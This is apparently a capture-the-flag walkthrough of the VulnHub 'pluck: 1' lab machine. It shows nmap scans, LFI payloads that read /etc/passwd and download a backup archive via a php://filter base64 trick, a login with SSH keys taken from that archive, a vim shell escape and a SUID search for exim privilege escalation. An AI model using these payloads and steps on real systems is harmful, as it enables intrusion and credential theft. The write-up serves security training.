In this post we will walk-through the pluck: 1 VM So let’s start !
Enumeration:
We will scan all TCP ports along with top UDP ports
root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153 \ > && nmap -sU -sV -A --top-ports 100 192.168.17.153 \ > && nmap -sU -p 161 192.168.17.153 \ > && nmap -sU -p 69 192.168.17.153 Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03 Nmap scan report for 192.168.17.153 Host is up, received arp-response (0.0010s latency). Not shown: 65531 closed ports Reason: 65531 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA) |_ 256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Pluck 3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized) 5355/tcp open llmnr? syn-ack ttl 1 MAC Address: 00:0C:29:1E:99:39 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.05 ms 192.168.17.153 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03 Nmap scan report for 192.168.17.153 Host is up (0.00061s latency). Not shown: 98 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 69/udp open|filtered tftp MAC Address: 00:0C:29:1E:99:39 (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.61 ms 192.168.17.153 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03 Nmap scan report for 192.168.17.153 Host is up (0.00074s latency). PORT STATE SERVICE 161/udp closed snmp MAC Address: 00:0C:29:1E:99:39 (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03 Nmap scan report for 192.168.17.153 Host is up (0.00056s latency). PORT STATE SERVICE 69/udp open|filtered tftp MAC Address: 00:0C:29:1E:99:39 (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
The website on port 80 is powered by PHP, I did try many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and PHP base64-encode trick !
http://192.168.17.153/index.php?page=/etc/passwd
now we have a list of users:
- bob
- peter
- paul
- backup-user
Exploitation
I did try to brute-force , SQLi the admin login page but no luck.
Next I went back to the users list and tried to include the backup script mentioned in login shell of backup-user
http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh
We can try to include the tar file but this will be a total mess ! so let’s make a use of PHP base64-encode trick to download the file safely by encoding the data of backup.tar file then cut the HTML around it and decode it locally.
curl http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup
After extracting the file We notice the existence of keys folder containing SSH keys of the user Paul, We will test the keys until we get a valid SSH login
ssh paul@192.168.17.153 -i id_key4
We are presented with shell login of menu type in this case Pdmenu, However We can escape this menu by selecting Edit file and type any file name to start using the vim.
:set shell=/bin/bash
Then type the following to jump on Bash
:shell
Privilege Escalation
I did try to escalate using Kernel exploits but no luck, However after searching for SUIDs We can notice the existence of exim agent.
paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
I did try some exploits to escalate the privilege using exim agent but did not work for me, However I decided to give this exploit a shot since the difference in version is minimal and luckily this exploit works.
Flag:
and that’s it.